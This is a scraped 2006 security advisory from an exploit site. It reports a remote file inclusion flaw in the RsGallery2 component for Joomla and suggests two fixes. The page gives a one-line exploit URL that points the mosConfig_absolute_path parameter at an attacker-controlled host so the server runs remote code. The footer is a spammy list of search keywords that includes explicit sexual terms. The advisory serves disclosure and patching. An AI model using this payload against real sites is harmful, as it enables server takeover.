about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability




2006-06-28 RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability
Rated as : Moderate Risk

RsGallery2 for Joomla
---------------------------------------------------------------------------

Discovered: marriottvn
Remote : Yes
Level : High

---------------------------------------------------------------------------
Affected software description :

Application : RsGallery2
version : latest version [ 1.11.2 ]
Description: component for joomla
URL: http://rsdev.nl

----------------------------------------------------------------------------

Vulnerable file :

rsgallery2.html.php

----------------------------------------------------------------------------

Exploit:

http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]

----------------------------------------------------------------------------

Fix:

1.Declare variabel $mosConfig_absolute_path

or

2.Add into the top function:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not
allowed.' );

----------------------------------------------------------------------------

Contact:

Nick: marriottvn
E-mail: i_love_lonely_girl[at]yahoo.com
Web: http://vnsecurity.com

Greetz to: VnRekcah
securitydot.net - 2006-06-28

Advertising

Copyright 2007, SecurityDot
Mon, 07 Dec 2009 06:08:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Asianude.h artis.seks www.mir200 inspecter iis4 Pussy fuck news for c Arab sex v free sex f www.sex mo Dad fuck d galerisex joomla com yefeixiang news for c Apache mod www.gia18. Hot sex gi sexiph www.thehd. www.cndigu kernel 2.4 www.buyfit PHP guestb Apache htt bollywood Www.Moobe. www.gofad. free down XXX vedeo vBulletin errors.php www.taoke1 thamil fli Apache htt AYU ASARI www.ngfelt www.scanda www,free.f SignKorn newsdetail www.gia18. Sxygirls components Sexviedo SMF.html// xxl18 Apache Exp Faking mapuca